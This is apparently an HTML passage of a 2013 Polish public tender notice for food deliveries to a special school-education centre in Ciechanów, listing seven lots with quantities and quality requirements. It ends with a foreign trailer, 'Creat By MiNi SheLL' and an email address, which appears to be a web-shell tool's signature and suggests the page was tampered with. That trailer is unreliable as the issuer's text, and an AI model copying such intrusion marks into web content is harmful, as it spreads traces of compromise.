<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	    lista podmiotów należących do tej  samej grupy kapitałowej o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień albo informacja o tym że nie należy do grupy kapitałowej  o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień
2)	    zaakceptowany przez wykonawcę projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stciechanow.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Ośrodek Szkolno-Wychowawczy w Ciechanowie, ul. Sienkiewicza 13, 06-400 Ciechanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2013 godzina 09:00, miejsce: Specjalny Ośrodek Szkolno-Wychowawczy w Ciechanowie, ul. Sienkiewicza 13, 06-400 Ciechanów - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze sypkie, koncentraty, przyprawy i desery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - Artykuły spożywcze sypkie, koncentraty, przyprawy i desery

Lp.	Nazwa artykułu i wielkość opakowania jednostkowego	Jednostka miary	Ilość
68		Baton Grzesiek 50 g	szt	49
69		Budyń Słodka chwila 43g	szt	31
70		Chrzan 160g	szt	7
71		Ciastka Petitki 50g	szt	115
72		Ciasto francuskie 275g	szt 	8
73		Cukier 1kg	kg	299
74		Cukier puder 0,5 kg	kg	4
75		Dżem truskawkowy n/s 300g	szt	142
76		Dżem truskawkowy n/s 450g	szt	60
77		Dżem wisnia n/s 300g	szt	143
78		Groszek konserwowy 400g	szt	68
79		Herbata 100g	szt	58
80		Kakao 100g	szt	7
81		Kakao Puchatek 500g	szt	2
82		Kasza gryczana 0,5kg	kg	29,5
83		Kasza jęczmienna 400g	kg	58
84		Kawa Inka 150g	szt	1
85		Ketchup Miwex 500g	szt	183
86		Kisiel cytrynowy 58g	szt	75
87		Kisiel Słodka chwila 30g	szt	84
88		Kisiel Słodka chwila 40g	szt	100
89		Kompot (różne smaki) 920g	szt	48
90		Koncentrat pomidorowy 190g	szt	12
91		Koncentrat pomidorowy 950g	szt	69
92		Kukurydza konserwowa 360g	szt	12
93		Kwasek cytrynowy 20g	szt	36
94		Liść laurowy 0,1 kg	kg	0,7
95		Majeranek 0,2 kg	kg	1
96		Majonez kętrzyński 460g	szt	10
97		Majonez kętrzyński 815g	szt	60
98		Makaron falbanki 750g	szt	5
99		Makaron krajanka 400g	szt	23
100		Makaron nitka 250g	szt	88
101		Makaron nitka 400g	szt	109
102		Makaron rurki 500g	szt	103
103		Makaron spaghetti 0,5	kg	57,5
104		Makaron świderek 1 kg	kg	63
105		Makaron świderek 400g	szt	60
106		Makaron świderek 500g	kg	13,5
107		Marina przyprawa do kurczaka 1kg	kg	5
108		Masło roślinne 250g/500g	kg	110
109		Maka pszenna 1kg	kg	122
110		Mąka ziemniaczana 1kg	kg	4
111		Miód jednorazowy 25g	szt	106
112		Musztarda 200g	szt	64
113		Ocet 0,5 L	szt	32
114		Ogórek konserwowy 0,9 L	szt	34
115		Olej 1 L	szt	202
116		Pasztet podlaski 195g	szt	287
117		Pieprz mielony 0,5kg	kg	5
118		Płatki Corn flakes 250g	szt	70
119		Płatki Corn flakes 500g	szt	47
120		Powidła śliwkowe 280g	szt	12
121		Przyprawa Kucharek 1kg	szt	69
122		Przyprawa Kucharek 200g	szt	33
123		Przyprawa Kucharek 500g	szt	51
124		Przyprawa Vegeta 200g	szt	20
125		Płatki - Przysmak śniadaniowy 250g (różne smaki)	szt	96
126		Ryż 1kg	kg	90
127		Sałatka szwedzka 900g	szt	5
128		Serek topiony 100g	kg	1
129		Sól 1kg	kg	83
130		Sos słodko-kwaśny 520g	szt	112
131		Syrop mix-paloma 500g	szt	29
132		Syrop owocowy mix 430g	szt	282
133		Szczaw konserwowy	szt	81
134		Ziele angielskie 0,2kg	kg	0,2
Artykuły spożywcze mają być dostarczane do Zamawiającego w opakowaniach zbiorczych - zgrzewkach, kartonach itp.,  oznaczonych numerem tej samej partii towaru. 
Wszystkie artykuły muszą być świeże, z początkowego terminu przydatności do spożycia .
Artykuły sypkie muszą być bez zanieczyszczeń.
Makarony muszą odpowiadać jakością najlepszych makaronów na rynku i nie mogą rozpadać się podczas gotowania.
Opakowania wszystkich w/w artykułów nie mogą być uszkodzone ( porwane , dziurawe itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3, 15.61.00.00-7, 15.85.10.00-8, 15.30.00.00-1, 15.87.00.00-7, 15.86.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świeże mięso, wędliny i drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Drób - mięso świeże 

Lp.	Nazwa artykułu	Jednostka miary	Ilość
5		Filet z kurczaka	kg	135
6		Ćwiartka tylna z kurczaka	kg	286
7		Kurczaki 	kg	13
8		Korpus z kurczaka	kg	310

Drób - wędliny świeże 

Lp.	Nazwa artykułu	Jednostka miary	Ilość
2		Szynka z piersi kurczaka	kg	13

Mięso świeże wieprzowe, wołowe

Lp.	Nazwa artykułu	Jednostka miary	Ilość
12		Boczek surowy	kg	2
13		Karkówka bez kości	kg	57
14		Kości wieprzowe 	kg	74
15		Łopatka bez kości 	kg	318
16		Schab bez kości 	kg	96
17		Szynka bez kości surowa	kg	35
18		Udziec wołowy bez kości 	kg	51
19		Żeberka wieprzowe	kg	110
20		Podgardle 	kg	2
21		Szponder wołowy	kg	2
22		Słonina 	kg	41

Wędliny świeże

Lp.	Nazwa artykułu	Jednostka miary	Ilość
19		Berlinki 	kg	10
20		Boczek wedzony	kg	30
21		Kiełbasa zwyczajna	kg	76
22		Kaszanka gryczana	kg	59
23		Kiełbasa ogniskowa	kg	13
24		Kiełbasa krakowska parzona	kg	24
25		Kiełbasa szynkowa	kg	41
26		Tyrolska 	kg	79
27		Parówkowa 	kg	84
28		Mortadela 	kg	50
29		Ogonówka parzona 	kg	45
30		Parówki hoddogowe 	kg	45
31		Pieczeń wiedeńska 	 kg	39
32		Pasztetowa 	kg	24
33		Kiełbasa biała chłopska	kg	17
34		Kiełbasa śląska	kg	15
35		Pasztet domowy 	kg	19
36		Kiełbasa wekendowa	kg	12

Mięso, drób i wędliny muszą być świeże, bez nalotu i zapachu starego mięsa z początkowym terminem przydatności do spożycia, a waga jego po zważeniu u Zamawiającego musi odpowiadać wadze na fakturze. Zamawiający nie uwzględnia ubytku który powstanie podczas transportu w postaci wody.
Mięso winno być  ze świeżego rozbioru, bez konserwantów, w stanie pozwalającym na zamrożenie.
Wędliny muszą być świeże, wysokiej jakości pod względem właściwości organoleptycznych - świeży wygląd, smak, zapach - jak i odżywczych,  w początkowym terminie przydatności do spożycia przewidzianego dla danej wędliny.
Na mięso, drób i wędliny przy każdej dostawie ma być dostarczony Handlowy Dokument Identyfikacyjny (HDI)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.11.21.00-7, 15.13.11.30-5, 15.11.30.00-3, 15.11.10.00-9, 15.13.11.35-0, 15.13.13.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Jaja kurze świeże o gramaturze 53 g-63g.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazawa artykułu	Jednostka miary	Ilość
2		Jaja kurze (wielkość jaja M, sposób chowu 3)	szt	4700

Do Zamawiającego mogą być dostarczone jaja kurze o lepszych parametrach, jednak w cenie nie
 wyższej jak ustalona dla wielkości jaja M i sposobu chowu 3. Jaja muszą być czyste, oznakowane 
kodem producenta zawierającym sposób chowu kur, kod kraju producenta i weterynaryjny numer identyfikacyjny. Na opakowaniu musi być umieszczony aktualny termin przydatności do spożycia. 
Do Zamawiającego muszą być dostarczane  w początkowym terminie przydatności do spożycia. 
Na jaja przy każdej dostawie ma być dostarczony Handlowy Dokument Identyfikacyjny (HDI)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mleko i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Ilość
13		Mleko spożywcze 2 %	litry	570
14		Jogurt 150g	szt	452
15		Jogurt 135g	szt	10
16		Serek hochland krążek mix 200g	op	33
17		Ser twardy salami	kg	53
18		Śmietana 30 %	litry	140
19		śmietana 18 %	litry	13
20		Twaróg półtłusty	kg	50
21		Twaróg homogenizowany 150g	szt	500
22		Masło śmietankowe 200g	kg	104
23		Ser twardy edamski	kg	19
24		Serek wiejski 150g	szt	70

Mleko i produkty mleczarskie muszą być w oryginalnych opakowaniach jednostkowych producenta, dostarczone do Zamawiającego w opakowaniach zbiorczych - zgrzewkach, kartonach itp., 
oznaczonych numerem tej samej partii towaru.  Produkty mleczarskie muszą być świeże, smaczne, pachnące i posiadać aktualny  termin przydatności do spożycia przewidziany dla danego produktu .
 Do Zamawiającego muszą być dostarczane  w początkowym terminie przydatności do spożycia. 
Przy każdej dostawie ma być dostarczony Handlowy Dokument Identyfikacyjny (HDI)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-6, 15.54.21.00-2, 15.55.13.00-8, 15.54.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pieczywo i wyroby piekarnicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Ilość 
11		Chleb zwykły krojony 0,5kg	szt	1770
12		Chleb razowy krojony 0,5kg	szt	240
13		Bułka zwykła 0,1kg	szt	6400
14		Bułka tarta 0,5kg	kg	68
15		Placek drożdżowy	szt	10
16		Pączki 	szt	300
17		Bułka drożdżowa	szt 	100
18		Bułka słodka	szt	100
19		Babka piaskowa	szt	16
20		Rogal czekoladowy	szt	36

Pieczywo i  wyroby piekarnicze  - świeże dostarczane bezpośrednio po wytworzeniu.
Pieczywo i  wyroby piekarnicze ( w tym ciasto) mają być nie przypalone i nie popękane. Chleb nie 
może być gliniasty i nie może się kruszyć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.81.10.00-6, 15.81.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mrożone artykuły spożowcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Ilość
9		Pierogi z truskawką 1 kg	kg	44
10		Pierogi z truskawką  450g	szt	31
11		Frytki 2,5 kg	szt	75
12		Mieszanka warzywna 450g	kg	36
13		Pierogi z mięsem 450g	kg	39,6
14		Pierogi z serem 450g	kg	45,9
15		Pizza z szynką 1kg	szt	9
16		Pyzy z mięsem 450g	szt	85
Mrożonki muszą być nie przeterminowane z aktualnym terminem przydatności do 
spożycia.  Do Zamawiającego muszą być dostarczane   w  początkowym terminie przydatności do 
spożycia, w opakowaniach zbiorczych - zgrzewkach, kartonach itp., oznaczonych numerem tej 
samej partii towaru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.89.43.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ryby i przetwory rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Ilość
1	Filet z ryb (mrożony)	kg	80
2	Paprykarz 300g	szt	30
3	Makrela wędzona	kg	20
4	Szprot w oleju 170 g	szt	40
5	Szprot w pomidorach 300 g	szt	10
6	Matjas solony	kg	6
7	Płaty śledziowe marynowane	kg	6
8	Sałatka śledziowa	kg	5

Filety rybne muszą być mrożone z małą zawartością wody (SHP).
Filety mrożone, ryby wędzone, przetwory rybne, puszki rybne  muszą być nie przeterminowane 
z aktualnym terminem przydatności do spożycia, dostarczone w opakowaniach zbiorczych - zgrzewkach, kartonach itp., oznaczone numerem tej samej partii towaru. 
Do Zamawiającego muszą być dostarczane   w  początkowym terminie przydatności do spożycia.
Przy każdej dostawie ma być dostarczony Handlowy Dokument Identyfikacyjny (HDI)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3, 15.23.40.00-7, 15.24.00.00-2, 15.24.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com